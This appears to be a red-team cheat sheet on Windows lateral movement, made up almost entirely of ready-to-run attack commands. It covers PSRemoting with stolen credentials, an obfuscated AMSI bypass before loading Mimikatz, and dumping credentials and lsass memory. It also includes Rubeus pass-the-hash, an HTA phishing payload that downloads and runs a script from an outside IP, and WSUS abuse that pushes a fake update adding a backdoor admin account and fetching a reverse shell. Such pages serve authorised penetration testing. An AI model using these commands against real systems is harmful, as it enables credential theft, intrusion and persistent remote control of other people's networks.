Lateral Movement

PSRemoting

PSRemoting Session

1
New-PSSession -ComputerName Target1
2
Enter-PSSession -ComputerName Target1
3
​
4
# Set trusted hosts to psremote to IP rather than hostname
5
winrm set winrm/config/client ‘@{TrustedHosts="*"}’
6
​
7
# Connect with local admin creds
8
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred
Copied!

Pass Creds

1
# If you have RDP access and can get a prompt
2
$cred = Get-Credential Domain\Username
3
invoke-command -Credential $cred -computername x -scriptblock {whoami}
4
​
5
# If you are over C2 and cant get a prompt
6
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
Copied!

PSRemoting Invoke-Command

1
# Execute Commands or script blocks:
2
Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
3
​
4
# Execute scripts from files:
5
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
6
​
7
# Execute locally loaded function on the remote machines:
8
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
9
​
10
# Pass arguments:
11
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) ArgumentList
12
​
13
# Function call within script is used:
14
Invoke-Command –Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
15
​
16
# Execute stateful commands:
17
$Sess = New-PSSession –Computername Server1
18
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
19
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}
Copied!

Stateful Mimikatz

1
$sess = new-pssession -computername server1
2
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )}
3
Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1
4
Enter-PSSession -session $sess
Copied!

Invoke-Mimikatz

1
# Dump Creds on local machine
2
Invoke-Mimikatz -DumpCreds
3
​
4
# Dump creds on multiple machines
5
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")
6
​
7
# "Over pass the hash" generate tokens from hashes
8
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'
Copied!

Double Hop Problem

PowerShell

1
$cred = Get-Credential DOMAIN\USER
2
​
3
# Execute commands
4
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}
5
​
6
# Copy files
7
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}
8
​
9
# Dump
10
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}
11
​
12
# Copy dump back
13
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}
14
​
15
can use rubeus over double hop to extrat ticket then interact with 3rd system:
16
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}
Copied!

PsExec / Rubeus

1
# psexec to first host
2
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd
3
​
4
# Use rubeus on first host to overpass the hash and then access second host.
5
# NOTE: using the /domain flag makes it unreliable.
6
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt
Copied!

Phish

1
# Generate HTA
2
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
3
​
4
# Send Email
5
Send-MailMessage -From 'User01 <[email protected]>' -To 'User02 <[email protected]>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF
6
​
7
# use Nishang to generate powershell phish payloads
Copied!

Pass-The-Hash

1
runas /noprofile /netonly /user:<domain\username> powershell.exe
2
​
3
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt
4
​
5
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'
Copied!

PsExec

​
​

WSUS

Enumeration

1
# If you compromise a wsus server you can own a lot
2
​
3
# See which comps connecting for updates (port 8530 = http, port 8531 = https)
4
netstat -ano
Copied!

Abuse

1
https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1
2
​
3
# Load psexec into directory and WSUSpendu
4
​
5
# Send out malicious update to gain local admin on machine
6
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net
7
​
8
# Compromise isolated networks with a reverse shell
9
# Where Script is an amsi bypass plus a reverse shell connecting over 8531
10
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>
11
​
12
# Listen on host and wait
13
powercat -l -v -p 8531
Copied!
Last modified 1yr ago